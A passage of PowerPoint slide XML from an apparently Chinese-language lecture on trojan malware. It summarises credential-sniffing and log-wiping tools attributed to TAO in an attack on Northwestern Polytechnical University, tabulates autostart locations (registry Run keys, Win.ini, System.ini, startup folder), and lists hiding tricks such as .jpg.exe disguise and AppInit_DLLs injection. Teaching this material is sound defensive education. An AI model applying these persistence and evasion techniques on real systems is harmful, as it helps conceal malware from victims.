          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>①“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>饮茶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>”：长期驻留在32位或64位的Solaris系统中，通过嗅探进程间通信的方式获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>ssh、telnet、rlogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>等多种远程登录方式下暴露的账号口令。TAO主要使用该武器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>嗅探西北工业大学业务人员实施运维工作时产生的账号口令、命令行操作记录、日志文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>等，压缩加密存储后供NOPEN木马下载。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>②“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>敌后行动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>”系列武器：针对电信运营商特定的工具。“敌后行动”会与不同的解析工具配合使用。TAO在对西北工业大学的网络攻击中使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“魔法学校”、“小丑食物”和“诅咒之火”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>等3类针</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>对电信运营商的攻击窃密工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6623870" y="4552194"/>
            <a:ext cx="360680" cy="262890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1695"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6667500" y="5019675"/>
            <a:ext cx="1434465" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>隐蔽消痕</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>类武器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4690110" y="5518150"/>
            <a:ext cx="7133590" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>吐司面包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>”：可用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>查看、修改utmp、wtmp、lastlog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>等日志文件以清除操作痕迹。TAO主要使用该武器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>清除、替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>被控西北工业大学上网设备上的各类日志文件，隐藏其恶意行为。TAO对西北工业大学的网络攻击中共使用了3款不同版本的“吐司面包”。</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1818005" y="1167130"/>
            <a:ext cx="10259060" cy="4523740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1946071"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346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木马实施攻击的步骤</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木马开机启动技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1678940" y="822960"/>
          <a:ext cx="10304780" cy="4754880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7731125">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1108075">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1465580">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>启动方式</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>隐蔽性</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>实施难度</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>通过"开始\程序\启动"</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>2星</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>较低</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>通过Win.ini文件</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>星</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>较低</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>通过注册表启动</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
                        <a:t>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce，HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce和</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
                        <a:t>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
                        <a:t>3.5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>星</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>极高</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>通过Autoexec.bat文件，或winstart.bat，config.sys文件</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>3.5星</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>较低</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>通过System.ini文件</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>5星</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1280160">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>通过某特定程序或文件启动</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
                        <a:buChar char="Ø"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
                        <a:t>寄生于特定程序之中</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
                        <a:buChar char="Ø"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
                        <a:t>将特定的程序改名</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
                        <a:buChar char="Ø"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
                        <a:t>文件关联</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>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20215" y="975995"/>
            <a:ext cx="10292715" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>最基本的隐藏：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不可见窗体＋隐藏文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>集成到合法程序中 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>隐藏在配置文件中 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，如Autoexec.bat和Config.sys中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>潜伏在Win.ini中 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，如run=c:\windows\file.exe；load=c:\windows\file.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>伪装在普通文件中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，如把可执行文件伪装成图片或文本，在程序中把图标改成Windows的默认图片图标, 再把文件名改为*.jpg.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内置到注册表中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，如HKEY_LOCAL_MACHINE\ Software\Microsoft \Windows\CurrentVersion下所有以“run”开头的键值  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在System.ini中藏身</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，如利用 System.ini中的[mic]、[drivers]、[drivers32]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>隐形于启动组中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，对应的文件夹为：C:\windows\ start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>menu\programs\startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>隐蔽在Winstart.bat中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>捆绑在启动文件中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>设置在超级连接中 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注册为系统的“服务”程序 </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346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木马是如何隐藏的？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99615" y="993775"/>
            <a:ext cx="9504680" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进程插入技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1)使用注册表插入DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>　　早期的进程插入式木马的伎俩，通过修改注册表中的[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs]来达到插入进程的目的。</a:t>
            </a:r>
          </a:p>
